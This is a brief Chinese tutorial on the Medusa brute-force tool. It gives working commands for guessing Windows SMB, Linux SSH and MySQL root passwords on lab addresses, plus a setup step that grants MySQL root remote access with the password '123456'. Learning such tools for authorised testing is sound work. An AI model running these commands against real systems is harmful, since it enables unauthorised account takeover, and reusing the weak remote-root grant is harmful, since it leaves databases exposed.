实战-使用Medusa工具在线破解
Medusa简介
Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。 Medusa 和 hydra 一样,同样属于在线密码破解工具。 Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP(NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, RDP、 rlogin, rsh, SMBNT, SMTP(AUTH/VRFY), SNMP, SSHv2, SVN,Telnet, VmAuthd, VNC、 Generic Wrapper以及Web表单的密码爆破工具。
官方网站:
http://foofus.net/goons/jmk/medusa/medusa.html
软件下载地址:
https://github.com/jmk-foofus/medusa/archive/2.2.tar.gz
1.Medusa工具破解Win7文件共享密码
# medusa -M smbnt -h 192.168.112.101 -e ns -F -u administrator -P m.txt
-M 模块
-h 目标IP
n 空密码
s 密码与用户名相同
-F 破解到一个正确密码即退出
2.Medusa工具破解Linux root用户登录密码
# medusa -M ssh -h 192.168.112.101 -e ns -F -u root -P m.txt
-o ./ssh.log
3.Medusa破解MySQL root用户登录密码
MySQL授权root用户允许远程登录
# mysql -u root -p123456
MariaDB [(none)]> grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;
MariaDB [(none)]> exit
进行暴力破解
# medusa -M mysql -h 192.168.112.100 -e ns -F -u root -P m.txt

